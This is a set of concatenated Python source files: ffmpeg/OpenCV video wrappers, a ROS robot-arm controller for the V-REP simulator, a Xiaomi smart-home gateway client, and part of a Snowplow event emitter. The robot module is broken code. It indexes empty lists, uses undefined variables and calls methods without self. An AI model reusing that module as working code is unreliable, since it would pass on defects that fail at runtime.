self._writer = cv2.VideoWriter()
etau.ensure_path(self.outpath)
self._writer.open(self.outpath, -1, self.fps, self.size, True)
if not self._writer.isOpened():
raise OpenCVVideoWriterError("Unable to open '%s'" % self.outpath)
def write(self, img):
"""Appends the image to the output video.
Args:
img: a numpy array
"""
self._writer.write(etai.rgb_to_bgr(img))
def close(self):
"""Closes the video writer."""
# self._writer.release() # warns to use a separate thread
threading.Thread(target=self._writer.release, args=()).start()
class OpenCVVideoWriterError(VideoWriterError):
"""Exception raised when a problem with an OpenCVVideoWriter is
encountered.
"""
pass
class FFprobe(object):
"""Interface for the ffprobe binary."""
DEFAULT_GLOBAL_OPTS = ["-loglevel", "error"]
def __init__(self, global_opts=None, opts=None):
"""Creates an FFprobe instance.
Args:
global_opts: a list of global options for ffprobe. By default,
self.DEFAULT_GLOBAL_OPTS is used
opts: a list of options for ffprobe
"""
self._global_opts = global_opts or self.DEFAULT_GLOBAL_OPTS
self._opts = opts or []
self._args = None
self._p = None
@property
def cmd(self):
"""The last executed ffprobe command string, or None if run() has not
yet been called.
"""
return " ".join(self._args) if self._args else None
def run(self, inpath, decode=False, verbose=False):
"""Run the ffprobe binary with the specified input path.
Args:
inpath: the input path
Returns:
out: the stdout from the ffprobe binary
decode: whether to decode the output bytes into utf-8 strings. By
default, the raw bytes are returned
verbose: whether to log the ffprobe command used at INFO level. By
default, this is False
Raises:
ExecutableNotFoundError: if the ffprobe binary cannot be found
ExecutableRuntimeError: if the ffprobe binary raises an error
during execution
"""
self._args = (
["ffprobe"] + self._global_opts + self._opts + ["-i", inpath]
)
if verbose:
logger.info("Executing '%s'", self.cmd)
else:
logger.debug("Executing '%s'", self.cmd)
try:
self._p = Popen(self._args, stdout=PIPE, stderr=PIPE)
except EnvironmentError as e:
if e.errno == errno.ENOENT:
raise etau.ExecutableNotFoundError(exe="ffprobe")
raise
out, err = self._p.communicate()
if self._p.returncode != 0:
raise etau.ExecutableRuntimeError(self.cmd, err)
return out.decode("utf-8") if decode else out
class FFmpeg(object):
"""Interface for the ffmpeg binary.
Example usages:
# Convert a video to sampled frames
ffmpeg = = FFmpeg()
ffmpeg.run("/path/to/video.mp4", "/path/to/frames/%05d.png")
# Resize a video
ffmpeg = FFmpeg(size=(512, -1))
ffmpeg.run("/path/to/video.mp4", "/path/to/resized.mp4")
# Change the frame rate of a video
ffmpeg = FFmpeg(fps=10)
ffmpeg.run("/path/to/video.mp4", "/path/to/resampled.mp4")
"""
DEFAULT_GLOBAL_OPTS = ["-loglevel", "error"]
DEFAULT_IN_OPTS = ["-vsync", "0"]
DEFAULT_VIDEO_OUT_OPTS = [
"-c:v",
"libx264",
"-preset",
"medium",
"-crf",
"23",
"-pix_fmt",
"yuv420p",
"-vsync",
"0",
"-an",
]
DEFAULT_IMAGES_OUT_OPTS = ["-vsync", "0"]
def __init__(
self,
fps=None,
size=None,
scale=None,
global_opts=None,
in_opts=None,
out_opts=None,
):
"""Creates an FFmpeg instance.
Args:
fps: an optional output frame rate. By default, the native frame
rate of the input video is used
size: an optional output (width, height) for each frame. At most
one dimension can be -1, in which case the aspect ratio is
preserved
scale: an optional positive number by which to scale the input
video (e.g., 0.5 or 2)
global_opts: an optional list of global options for ffmpeg. By
default, self.DEFAULT_GLOBAL_OPTS is used
in_opts: an optional list of input options for ffmpeg, By default,
self.DEFAULT_IN_OPTS is used
out_opts: an optional list of output options for ffmpeg. By
default, self.DEFAULT_VIDEO_OUT_OPTS is used when the output
path is a video file and self.DEFAULT_IMAGES_OUT_OPTS is used
when the output path is an image sequence
"""
self.is_input_streaming = False
self.is_output_streaming = False
self._filter_opts = self._gen_filter_opts(fps, size, scale)
self._global_opts = global_opts or self.DEFAULT_GLOBAL_OPTS
self._in_opts = in_opts
self._out_opts = out_opts
self._args = None
self._p = None
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
@property
def cmd(self):
"""The last executed ffmpeg command string, or None if run() has not
yet been called.
"""
return " ".join(self._args) if self._args else None
def run(self, inpath, outpath, verbose=False):
"""Run the ffmpeg binary with the specified input/outpath paths.
Args:
inpath: the input path. If inpath is "-", input streaming mode is
activated and data can be passed via the stream() method
outpath: the output path. Existing files are overwritten, and the
directory is created if needed. If outpath is "-", output
streaming mode is activated and data can be read via the
read() method
verbose: whether to log the ffmpeg command used at INFO level. By
default, this is False
Raises:
ExecutableNotFoundError: if the ffmpeg binary cannot be found
ExecutableRuntimeError: if the ffmpeg binary raises an error during
execution
"""
self.is_input_streaming = inpath == "-"
self.is_output_streaming = outpath == "-"
# Input options
if self._in_opts is None:
in_opts = self.DEFAULT_IN_OPTS
else:
in_opts = self._in_opts
# Output options
if self._out_opts is None:
if is_supported_video_file(outpath):
out_opts = self.DEFAULT_VIDEO_OUT_OPTS
else:
out_opts = self.DEFAULT_IMAGES_OUT_OPTS
else:
out_opts = self._out_opts
# Add filters to output options, if necessary
out_opts = list(out_opts)
if self._filter_opts:
merged = False
for idx, o in enumerate(out_opts):
if o.strip() == self._filter_opts[0]:
# Merge with existing filter(s)
out_opts[idx + 1] += "," + self._filter_opts[1]
merged = True
break
if not merged:
# Append filters
out_opts += self._filter_opts
# Construct ffmpeg command
self._args = (
["ffmpeg"]
+ self._global_opts
+ in_opts
+ ["-i", inpath]
+ out_opts
+ [outpath]
)
if not self.is_output_streaming:
etau.ensure_path(outpath)
if verbose:
logger.info("Executing '%s'", self.cmd)
else:
logger.debug("Executing '%s'", self.cmd)
try:
self._p = Popen(self._args, stdin=PIPE, stdout=PIPE, stderr=PIPE)
except EnvironmentError as e:
if e.errno == errno.ENOENT:
raise etau.ExecutableNotFoundError(exe="ffmpeg")
raise
# Run non-streaming jobs immediately
if not (self.is_input_streaming or self.is_output_streaming):
err = self._p.communicate()[1]
if self._p.returncode != 0:
raise etau.ExecutableRuntimeError(self.cmd, err)
def stream(self, string):
"""Writes the string to ffmpeg's stdin stream.
Args:
string: the string to write
Raises:
FFmpegStreamingError: if input streaming mode is not active
"""
if not self.is_input_streaming:
raise FFmpegStreamingError("Not currently input streaming")
self._p.stdin.write(string)
def read(self, num_bytes):
"""Reads the given number of bytes from ffmpeg's stdout stream.
Args:
num_bytes: the number of bytes to read
Returns:
the bytes
Raises:
FFmpegStreamingError: if output streaming mode is not active
"""
if not self.is_output_streaming:
raise FFmpegStreamingError("Not currently output streaming")
return self._p.stdout.read(num_bytes)
def close(self):
"""Closes a streaming ffmpeg program, if necessary."""
if self.is_input_streaming or self.is_output_streaming:
self._p.stdin.close()
self._p.stdout.close()
self._p.wait()
self._p = None
self.is_input_streaming = False
self.is_output_streaming = False
@staticmethod
def _gen_filter_opts(fps, size, scale):
filters = []
if fps is not None and fps > 0:
filters.append("fps={0}".format(fps))
if size:
filters.append("scale={0}:{1}".format(*size))
#
# If the aspect ratio is changing, we must manually set SAR/DAR
# https://stackoverflow.com/questions/34148780/ffmpeg-setsar-value-gets-overriden
#
if all(p > 0 for p in size):
# Force square pixels
filters.append("setsar=sar=1:1")
# Force correct display aspect ratio when playing video
filters.append("setdar=dar={0}/{1}".format(*size))
elif scale:
filters.append("scale=iw*{0}:ih*{0}".format(scale))
return ["-vf", ",".join(filters)] if filters else []
class FFmpegStreamingError(Exception):
"""Exception raised when an error occurs while operating an FFmpeg instance
in streaming mode.
"""
pass
class FOURCC(object):
"""Class reprsesenting a FOURCC code."""
def __init__(self, _i=None, _s=None):
"""Creates a FOURCC instance.
Don't call this directly! Instead, use `from_str ` or `from_int` to
create a FOURCC instance.
Args:
_i: the integer representation of the FOURCC code
_s: the string representation of the FOURCC code
"""
if _i:
self.int = _i
self.str = FOURCC.int_to_str(_i)
elif _s:
self.int = FOURCC.str_to_int(_s)
self.str = _s
@classmethod
def from_str(cls, s):
"""Construct a FOURCC instance from a string.
Args:
s: the string representation of the FOURCC code
Returns:
a FOURCC instance
"""
return cls(_s=s)
@classmethod
def from_int(cls, i):
"""Construct a FOURCC instance from an integer.
Args:
i: the integer representation of the FOURCC code
Returns:
a FOURCC instance
"""
return cls(_i=i)
@staticmethod
def str_to_int(s):
"""Returns the integer representation of the given FOURCC string.
Args:
s: the string representation of the FOURCC code
Returns:
the integer representation of the FOURCC code
"""
try:
# OpenCV 3
return cv2.VideoWriter_fourcc(*s)
except AttributeError:
# OpenCV 2
# pylint: disable=no-member
return cv2.cv.FOURCC(*s)
@staticmethod
def int_to_str(i):
"""Returns the string representation of the given FOURCC integer.
Args:
i: the integer representation of the FOURCC code
Returns:
the string representation of the FOURCC code
"""
return (
chr((i & 0x000000FF) >> 0)
+ chr((i & 0x0000FF00) >> 8)
+ chr((i & 0x00FF0000) >> 16)
+ chr((i & 0xFF000000) >> 24)
)
|
robot_module.py | #!/usr/bin/env python
import rospy
import threading
import vrep
import time
from sensor_msgs.msg import Joy
from sensor_msgs.msg import JointState
class Robot():
def __init__(self,connectionAddress='127.0.0.1' , connectionPort= 19997, waitUntilConnected=True, doNotReconnectOnceDisconnected=True, timeOutInMs=5000, commThreadCycleInMs=5):
rospy.init_node('robot_arm_node')
self.clientID = None
self.target_sphere_handle = None
self.axis_j1_handle = None
self.axis_j2_handle = None
self.axis_j3_handle = None
self.axis_j4_handle = None
self.axis_j5_handle = None
self.axis_j6_handle = None
self.target_handle = None
self.tip_handle = None
self.connectionAddress = connectionAddress
self.connectionPort = connectionPort
self.waitUntilConnected = waitUntilConnected
self.doNotReconnectOnceDisconnected = doNotReconnectOnceDisconnected
self.timeOutInMs = timeOutInMs
self.commThreadCycleInMs = commThreadCycleInMs
t1 = threading.Thread(target=self.subscriber_thread)
t1.start()
self.joint_state_pub = rospy.Publisher("/JointStates",JointState,queue_size=1)
def subscriber_thread(self):
self.joystick_sub = rospy.Subscriber("/joy",Joy,self.joy_control_cb)
rospy.spin()
def joy_control_cb(self,data):
returnCode,self.target_sphere_handle = vrep.simxGetObjectHandle(self.clientID,'Target_sphere',vrep.simx_opmode_oneshot_wait)
position = []
if returnCode == 0:
returnCode,target_sphere_position=vrep.simxGetObjectPosition(self.clientID,self.target_sphere_handle,-1,vrep.simx_opmode_oneshot_wait)
returnCode,target_sphere_orentation=vrep.simxGetObjectOrientation(self.clientID,self.target_sphere_handle,-1,vrep.simx_opmode_oneshot_wait)
position[0] = target_sphere_position[0] +0.001*data.buttons[3] - 0.001*data.buttons[2]
position[1] = target_sphere_position[1] +0.001*data.buttons[4] - 0.001*data.buttons[1]
position[2] = target_sphere_position[2] +0.001*data.buttons[6] - 0.001*data.buttons[5]
orentation[0] = target_sphere_orentation[0] +0.01*data.buttons[14] - 0.01*data.buttons[15]
orentation[1] = target_sphere_orentation[1] +0.001*data.buttons[4] - 0.001*data.buttons[1]
orentation[2] = target_sphere_orentation[2] +0.01*data.buttons[12] - 0.01*data.buttons[13]
vrep.simxSetObjectPosition(self.clientID,self.target_sphere_handle,-1,position,vrep.simx_opmode_oneshot_wait)
vrep.simxSetObjectOrientation(self.clientID,self.target_sphere_handle,-1,orentation,vrep.simx_opmode_oneshot_wait)
def get_object_handle(self):
returnCode,self.axis_handle[0] = vrep.simxGetObjectHandle(self.clientID,'axis_j1',vrep.simx_opmode_oneshot_wait)
returnCode,self.axis_handle[1] = vrep.simxGetObjectHandle(self.clientID,'axis_j2',vrep.simx_opmode_oneshot_wait)
returnCode,self.axis_handle[2] = vrep.simxGetObjectHandle(self.clientID,'axis_j3',vrep.simx_opmode_oneshot_wait)
returnCode,self.axis_handle[3] = vrep.simxGetObjectHandle(self.clientID,'axis_j4',vrep.simx_opmode_oneshot_wait)
returnCode,self.axis_handle[4] = vrep.simxGetObjectHandle(self.clientID,'axis_j5',vrep.simx_opmode_oneshot_wait)
returnCode,self.axis_handle[5] = vrep.simxGetObjectHandle(self.clientID,'axis_j6',vrep.simx_opmode_oneshot_wait)
#returnCode,self.target_handle = vrep.simxGetObjectHandle(self.clientID,'Target',vrep.simx_opmode_oneshot_wait)
#returnCode,self.tip_handle = vrep.simxGetObjectHandle(self.clientID,'Tip',vrep.simx_opmode_oneshot_wait)
return axis_handle
def pub_joint_states(self):
joint_position = []
Xmin = -2*math.pi
Xmax = 2*math.pi
Ymin = -6400*25
Ymax = 6400*25
joints = self.get_object_handle()
for joint in joints:
joint_position = vrep.simxGetJointPosition(self.clientID, joint, vrep.simx_opmode_oneshot_wait)
joint_position.append(map_joint_angle(joint_position,Xmin,Xmax,Ymin,Ymax))
joint_state_msg = JointState()
joint_state_msg.header.stamp = rospy.time()
joint_state_msg.header.frame_id = "Robot_frame"
joint_state_msg.position = joint_position
self.joint_state_pub.publish(joint_state_msg)
def map_joint_angle(self,value,xmin,xmax,ymin,ymax):
out= ( ((value-xmin)*(ymax-ymin))/(xmax-xmin) )+ymin
return out
def connect(self):
vrep.simxFinish(-1) #close all opened connections
self.clientID=vrep.simxStart(self.connectionAddress, self.connectionPort, self.waitUntilConnected, self.doNotReconnectOnceDisconnected, self.timeOutInMs, self.commThreadCycleInMs) # Connect to V-REP
if self.clientID!=-1:
print ('Connected to remote API server')
while True:
try:
pub_joint_states()
except rospy.ROSInterruptException:
pass
else:
rospy.loginfo("Failed connecting to remote API server")
"""
if __name__ == "__main__":
R = Robot()
R.connect()
"""
|
__init__.py | """Library to handle connection with Xiaomi Gateway"""
import socket
import json
import logging
import platform
import struct
from collections import defaultdict
from threading import Thread
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend
_LOGGER = logging.getLogger(__name__)
DEFAULT_DISCOVERY_RETRIES = 4
GATEWAY_MODELS = ['gateway', 'gateway.v3', 'acpartner.v3']
SOCKET_BUFSIZE = 4096
MULTICAST_PORT = 9898
MULTICAST_ADDRESS = '224.0.0.50'
def create_mcast_socket(interface, port):
"""Create and bind a socket for communication."""
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
if interface != 'any':
if platform.system() != "Windows":
try:
sock.bind((MULTICAST_ADDRESS, port))
except OSError:
sock.bind((interface, port))
else:
sock.bind((interface, port))
mreq = socket.inet_aton(MULTICAST_ADDRESS) + socket.inet_aton(interface)
else:
if platform.system() != "Windows":
try:
sock.bind(('', port))
except OSError:
sock.bind(('', port))
else:
sock.bind(('', port))
mreq = struct.pack("=4sl", socket.inet_aton(MULTICAST_ADDRESS), socket.INADDR_ANY)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
return sock
class XiaomiGatewayDiscovery:
"""PyXiami."""
# pylint: disable=too-many-instance-attributes
GATEWAY_DISCOVERY_PORT = 4321
def __init__(self, callback_func, gateways_config, interface,
device_discovery_retries=DEFAULT_DISCOVERY_RETRIES):
self.disabled_gateways = []
self.gateways = defaultdict(list)
self.callback_func = callback_func
self._listening = False
self._mcastsocket = None
self._threads = []
self._gateways_config = gateways_config
self._interface = interface
self._device_discovery_retries = device_discovery_retries
# pylint: disable=too-many-branches, too-many-locals, too-many-statements
def discover_gateways(self):
"""Discover gateways using multicast"""
_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
_socket.settimeout(5.0)
if self._interface != 'any':
_socket.bind((self._interface, 0))
for gateway in self._gateways_config:
host = gateway.get('host')
port = gateway.get('port')
sid = gateway.get('sid')
if not (host and port and sid):
continue
try:
ip_address = socket.gethostbyname(host)
if gateway.get('disable'):
_LOGGER.info(
'Xiaomi Gateway %s is disabled by configuration', sid)
self.disabled_gateways.append(ip_address)
continue
_LOGGER.info(
'Xiaomi Gateway %s configured at IP %s:%s',
sid, ip_address, port)
self.gateways[ip_address] = XiaomiGateway(
ip_address, sid, gateway.get('key'),
self._device_discovery_retries,
self._interface, port, gateway.get('proto'))
except OSError as error:
_LOGGER.error(
"Could not resolve %s: %s", host, error)
try:
_socket.sendto('{"cmd":"whois"}'.encode(),
(MULTICAST_ADDRESS, self.GATEWAY_DISCOVERY_PORT))
while True:
data, (ip_add, _) = _socket.recvfrom(SOCKET_BUFSIZE)
if len(data) is None or ip_add in self.gateways:
continue
if ip_add in self.gateways.keys() or ip_add in self.disabled_gateways:
continue
resp = json.loads(data.decode())
if resp["cmd"] != 'iam':
_LOGGER.error("Response does not match return cmd")
continue
if resp["model"] not in GATEWAY_MODELS:
_LOGGER.error("Response must be gateway model")
continue
disabled = False
gateway_key = None
for gateway in self._gateways_config:
sid = gateway.get('sid')
if sid is None or sid == resp["sid"]:
gateway_key = gateway.get('key')
if sid and sid == resp['sid'] and gateway.get('disable'):
disabled = True
sid = resp["sid"]
if disabled:
_LOGGER.info("Xiaomi Gateway %s is disabled by configuration",
sid)
self.disabled_gateways.append(ip_add)
else:
_LOGGER.info('Xiaomi Gateway %s found at IP %s', sid, ip_add)
self.gateways[ip_add] = XiaomiGateway(
ip_add, sid, gateway_key,
self._device_discovery_retries, self._interface, resp["port"],
resp["proto_version"] if "proto_version" in resp else None)
except socket.timeout:
_LOGGER.info("Gateway discovery finished in 5 seconds")
_socket.close()
def listen(self):
"""Start listening."""
_LOGGER.info('Creating Multicast Socket')
self._mcastsocket = create_mcast_socket(self._interface, MULTICAST_PORT)
self._mcastsocket.settimeout(5.0) # ensure you can exit the _listen_to_msg loop
self._listening = True
thread = Thread(target=self._listen_to_msg, args=())
self._threads.append(thread)
thread.daemon = True
thread.start()
def stop_listen(self):
"""Stop listening."""
self._listening = False
if self._mcastsocket is not None:
_LOGGER.info('Closing multisocket')
self._mcastsocket.close()
self._mcastsocket = None
for thread in self._threads:
thread.join()
_LOGGER.info('Multisocket stopped')
def _listen_to_msg(self):
while self._listening:
if self._mcastsocket is None:
continue
try:
data, (ip_add, _) = self._mcastsocket.recvfrom(SOCKET_BUFSIZE)
except socket.timeout:
continue
try:
data = json.loads(data.decode("ascii"))
gateway = self.gateways.get(ip_add)
if gateway is None:
if ip_add not in self.disabled_gateways:
_LOGGER.error('Unknown gateway ip %s', ip_add)
continue
cmd = data['cmd']
if cmd == 'heartbeat' and data['model'] in GATEWAY_MODELS:
gateway.token = data['token']
elif cmd in ('report', 'heartbeat'):
_LOGGER.debug('MCAST (%s) << %s', cmd, data)
self.callback_func(gateway.push_data, data)
else:
_LOGGER.error('Unknown multicast data: %s', data)
# pylint: disable=broad-except
except Exception:
_LOGGER.error('Cannot process multicast message: %s', data)
continue
_LOGGER.info('Listener stopped')
# pylint: disable=too-many-instance-attributes
class XiaomiGateway:
"""Xiaomi Gateway Component"""
# pylint: disable=too-many-arguments
def __init__(self, ip_adress, sid, key, discovery_retries, interface, port=MULTICAST_PORT, proto=None):
self.ip_adress = ip_adress
self.port = int(port)
self.sid = sid
self.key = key
self.devices = defaultdict(list)
self.callbacks = defaultdict(list)
self.token = None
self.connection_error = False
self.mac_error = False
self._discovery_retries = discovery_retries
self._interface = interface
if proto is None:
cmd = '{"cmd":"read","sid":"' + sid + '"}'
resp = self._send_cmd(cmd)
proto = _get_value(resp, "proto_version") if _validate_data(resp) else None
self.proto = '1.0' if proto is None else proto
trycount = 5
for _ in range(trycount):
_LOGGER.info('Discovering Xiaomi Devices')
if self._discover_devices():
break
# pylint: disable=too-many-branches
def _discover_devices(self):
cmd = '{"cmd" : "get_id_list"}' if int(self.proto[0:1]) == 1 else '{"cmd":"discovery"}'
resp = self._send_cmd(cmd, "get_id_list_ack") if int(self.proto[0:1]) == 1 \
else self._send_cmd(cmd, "discovery_rsp")
if resp is None or "token" not in resp or ("data" not in resp and "dev_list" not in resp):
return False
self.token = resp['token']
sids = []
if int(self.proto[0:1]) == 1:
sids = json.loads(resp["data"])
else:
for dev in resp["dev_list"]:
sids.append(dev["sid"])
sids.append(self.sid)
_LOGGER.info('Found %s devices', len(sids))
device_types = {
'sensor': ['sensor_ht', 'gateway', 'gateway.v3', 'weather',
'weather.v1', 'sensor_motion.aq2', 'acpartner.v3', 'vibration'],
'binary_sensor': ['magnet', 'sensor_magnet', 'sensor_magnet.aq2',
'motion', 'sensor_motion', 'sensor_motion.aq2',
'switch', 'sensor_switch', 'sensor_switch.aq2', 'sensor_switch.aq3', 'remote.b1acn01',
'86sw1', 'sensor_86sw1', 'sensor_86sw1.aq1', 'remote.b186acn01', 'remote.b186acn02',
'86sw2', 'sensor_86sw2', 'sensor_86sw2.aq1', 'remote.b286acn01', 'remote.b286acn02',
'cube', 'sensor_cube', 'sensor_cube.aqgl01',
'smoke', 'sensor_smoke',
'natgas', 'sensor_natgas',
'sensor_wleak.aq1',
'vibration', 'vibration.aq1'],
'switch': ['plug',
'ctrl_neutral1', 'ctrl_neutral1.aq1', 'switch_b1lacn02', 'switch.b1lacn02',
'ctrl_neutral2', 'ctrl_neutral2.aq1', 'switch_b2lacn02', 'switch.b2lacn02',
'ctrl_ln1', 'ctrl_ln1.aq1', 'switch_b1nacn02', 'switch.b1nacn02',
'ctrl_ln2', 'ctrl_ln2.aq1', 'switch_b2nacn02', 'switch.b2nacn02',
'86plug', 'ctrl_86plug', 'ctrl_86plug.aq1'],
'light': ['gateway', 'gateway.v3'],
'cover': ['curtain', 'curtain.aq2', 'curtain.hagl04'],
'lock': ['lock.aq1', 'lock.acn02']}
for sid in sids:
cmd = '{"cmd":"read","sid":"' + sid + '"}'
for retry in range(self._discovery_retries):
_LOGGER.debug("Discovery attempt %d/%d", retry + 1, self._discovery_retries)
resp = self._send_cmd(cmd, "read_ack") if int(self.proto[0:1]) == 1 else self._send_cmd(cmd, "read_rsp")
if _validate_data(resp):
break
if not _validate_data(resp):
_LOGGER.error("Not a valid device. Check the mac adress and update the firmware.")
self.mac_error = True
continue
model = resp["model"]
supported = False
for device_type in device_types:
if model in device_types[device_type]:
supported = True
xiaomi_device = {
"model": model,
"proto": self.proto,
"sid": resp["sid"].rjust(12, '0'),
"short_id": resp["short_id"] if "short_id" in resp else 0,
"data": _list2map(_get_value(resp)),
"raw_data": resp}
self.devices[device_type].append(xiaomi_device)
_LOGGER.debug('Registering device %s, %s as: %s', sid, model, device_type)
if not supported:
if model:
_LOGGER.error(
'Unsupported device found! Please create an issue at '
'https://github.com/Danielhiversen/PyXiaomiGateway/issues '
'and provide the following data: %s', resp)
else:
_LOGGER.error(
'The device with sid %s isn\'t supported of the used '
'gateway firmware. Please update the gateway firmware if '
'possible! This is the only way the issue can be solved.',
resp["sid"])
continue
return True
def _send_cmd(self, cmd, rtn_cmd=None):
try:
_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
if self._interface != 'any':
_socket.bind((self._interface, 0))
_socket.settimeout(10.0)
_LOGGER.debug("_send_cmd >> %s", cmd.encode())
_socket.sendto(cmd.encode(), (self.ip_adress, self.port))
data, _ = _socket.recvfrom(SOCKET_BUFSIZE)
except socket.timeout:
_LOGGER.error("Cannot connect to Gateway")
self.connection_error = True
return None
finally:
_socket.close()
if data is None:
_LOGGER.error("No response from Gateway")
return None
resp = json.loads(data.decode())
_LOGGER.debug("_send_cmd resp << %s", resp)
if rtn_cmd is not None and resp['cmd'] != rtn_cmd:
_LOGGER.error("Non matching response. Expecting %s, but got %s", rtn_cmd, resp['cmd'])
return None
return resp
def write_to_hub(self, sid, **kwargs):
"""Send data to gateway to turn on / off device"""
if self.key is None:
_LOGGER.error('Gateway Key is not provided. Can not send commands to the gateway.')
return False
data = {}
for key in kwargs:
data[key] = kwargs[key]
if not self.token:
_LOGGER.debug('Gateway Token was not obtained yet. Cannot send commands to the gateway.')
return False
cmd = dict()
cmd['cmd'] = 'write'
cmd['sid'] = sid
if int(self.proto[0:1]) == 1:
data['key'] = self._get_key()
cmd['data'] = data
else:
cmd['key'] = self._get_key()
cmd['params'] = [data]
resp = self._send_cmd(json.dumps(cmd), "write_ack") if int(self.proto[0:1]) == 1 \
else self._send_cmd(json.dumps(cmd), "write_rsp")
_LOGGER.debug("write_ack << %s", resp)
if _validate_data(resp):
return True
if not _validate_keyerror(resp):
return False
# If 'invalid key' message we ask for a new token
resp = self._send_cmd('{"cmd" : "get_id_list"}', "get_id_list_ack") if int(self.proto[0:1]) == 1 \
else self._send_cmd('{"cmd" : "discovery"}', "discovery_rsp")
_LOGGER.debug("get_id_list << %s", resp)
if resp is None or "token" not in resp:
_LOGGER.error('No new token from gateway. Can not send commands to the gateway.')
return False
self.token = resp['token']
if int(self.proto[0:1]) == 1:
data['key'] = self._get_key()
cmd['data'] = data
else:
cmd['key'] = self._get_key()
cmd['params'] = [data]
resp = self._send_cmd(json.dumps(cmd), "write_ack") if int(self.proto[0:1]) == 1 \
else self._send_cmd(json.dumps(cmd), "write_rsp")
_LOGGER.debug("write_ack << %s", resp)
return _validate_data(resp)
def get_from_hub(self, sid):
"""Get data from gateway"""
cmd = '{ "cmd":"read","sid":"' + sid + '"}'
resp = self._send_cmd(cmd, "read_ack") if int(self.proto[0:1]) == 1 else self._send_cmd(cmd, "read_rsp")
_LOGGER.debug("read_ack << %s", resp)
return self.push_data(resp)
def push_data(self, data):
"""Push data broadcasted from gateway to device"""
if not _validate_data(data):
return False
jdata = json.loads(data['data']) if int(self.proto[0:1]) == 1 else _list2map(data['params'])
if jdata is None:
return False
sid = data['sid']
for func in self.callbacks[sid]:
func(jdata, data)
return True
def _get_key(self):
"""Get key using token from gateway"""
init_vector = bytes(bytearray.fromhex('17996d093d28ddb3ba695a2e6f58562e'))
encryptor = Cipher(algorithms.AES(self.key.encode()), modes.CBC(init_vector),
backend=default_backend()).encryptor()
ciphertext = encryptor.update(self.token.encode()) + encryptor.finalize()
if isinstance(ciphertext, str): # For Python 2 compatibility
return ''.join('{:02x}'.format(ord(x)) for x in ciphertext)
return ''.join('{:02x}'.format(x) for x in ciphertext)
def _validate_data(data):
if data is None or ("data" not in data and "params" not in data):
_LOGGER.error('No data in response from hub %s', data)
return False
if "data" in data and 'error' in json.loads(data['data']):
_LOGGER.error('Got error element in data %s', data['data'])
return False
if "params" in data:
for param in data['params']:
if 'error' in param:
_LOGGER.error('Got error element in data %s', data['params'])
return False
return True
def _validate_keyerror(data):
if data is not None and "data" in data and 'Invalid key' in data['data']:
return True
if data is not None and "params" in data:
for param in data['params']:
if 'error' in param and 'Invalid key' in param['error']:
return True
return False
def _get_value(resp, data_key=None):
if not _validate_data(resp):
return None
data = json.loads(resp["data"]) if "data" in resp else resp["params"]
if data_key is None:
return data
if isinstance(data, list):
for param in data:
if data_key in param:
return param[data_key]
return None
return data.get(data_key)
def _list2map(data):
if not isinstance(data, list):
return data
new_data = {}
for obj in data:
for key in obj:
new_data[key] = obj[key]
new_data['raw_data'] = data
return new_data
|
emitters.py | """
emitters.py
Copyright (c) 2013-2014 Snowplow Analytics Ltd. All rights reserved.
This program is licensed to you under the Apache License Version 2.0,
and you may not use this file except in compliance with the Apache License
Version 2.0. You may obtain a copy of the Apache License Version 2.0 at
http://www.apache.org/licenses/LICENSE-2.0.
Unless required by applicable law or agreed to in writing,
software distributed under the Apache License Version 2.0 is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
express or implied. See the Apache License Version 2.0 for the specific
language governing permissions and limitations there under.
Authors: Anuj More, Alex Dean, Fred Blundun
Copyright: Copyright (c) 2013-2014 Snowplow Analytics Ltd
License: Apache License Version 2.0
"""
import requests
import json
import threading
import celery
from celery import Celery
from celery.contrib.methods import task
import redis
import logging
from contracts import contract, new_contract
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
DEFAULT_MAX_LENGTH = 10
THREAD_TIMEOUT = 10
PAYLOAD_DATA_SCHEMA = "iglu:com.snowplowanalytics.snowplow/payload_data/jsonschema/1-0-2"
new_contract("protocol", lambda x: x == "http" or x == "https")
new_contract("method", lambda x: x == "get" or x == "post")
new_contract("function", lambda x: hasattr(x, "__call__"))
new_contract("redis", lambda x: isinstance(x, (redis.Redis, redis.StrictRedis)))
try:
# Check whether a custom Celery configuration module named "snowplow_celery_config" exists
import snowplow_celery_config
app = Celery()
app.config_from_object(snowplow_celery_config)
except ImportError:
# Otherwise configure Celery with default settings
app = Celery("Snowplow", broker="redis://guest@localhost//")
class Emitter(object):
"""
Synchronously send Snowplow events to a Snowplow collector
Supports both GET and POST requests
"""
@contract
def __init__(self, endpoint, protocol="http", port=None, method="get", buffer_size=None, on_success=None, on_failure=None):
"""
:param endpoint: The collector URL. Don't include "http://" - this is done automatically.
:type endpoint: string
:param protocol: The protocol to use - http or https. Defaults to http.
:type protocol: protocol
:param port: The collector port to connect to
:type port: int | None
:param method: The HTTP request method
:type method: method
:param buffer_size: The maximum number of queued events before the buffer is flushed. Default is 10.
:type buffer_size: int | None
:param on_success: Callback executed after every HTTP request in a flush has status code 200
Gets passed the number of events flushed.
:type on_success: function | None
:param on_failure: Callback executed if at least one HTTP request in a flush has status code 200
Gets passed two arguments:
1) The number of events which were successfully sent
2) If method is "post": The unsent data in string form;
If method is "get": An array of dictionaries corresponding to the unsent events' payloads
:type on_failure: function | None
"""
self.endpoint = Emitter.as_collector_uri(endpoint, protocol, port, method)
self.method = method
if buffer_size is None:
if method == "post":
buffer_size = DEFAULT_MAX_LENGTH
else:
buffer_size = 1
self.buffer_size = buffer_size
self.buffer = []
self.on_success = on_success
self.on_failure = on_failure
self.threads = []
logger.info("Emitter initialized with endpoint " + self.endpoint)
@staticmethod
@contract
def as_collector_uri(endpoint, protocol="http", port=None, method="get"):
"""
:param endpoint: The raw endpoint provided by the user
:type endpoint: string
:param protocol: The protocol to use - http or https
:type protocol: protocol
:param port: The collector port to connect to
:type port: int | None
:rtype: string
"""
if method == "get":
path = "/i"
else:
path = "/com.snowplowanalytics.snowplow/tp2"
if port is None:
return protocol + "://" + endpoint + path
else:
return protocol + "://" + endpoint + ":" + str(port) + path
@contract
def input(self, payload):
"""
Adds an event to the buffer.
If the maximum size has been reached, flushes the buffer.
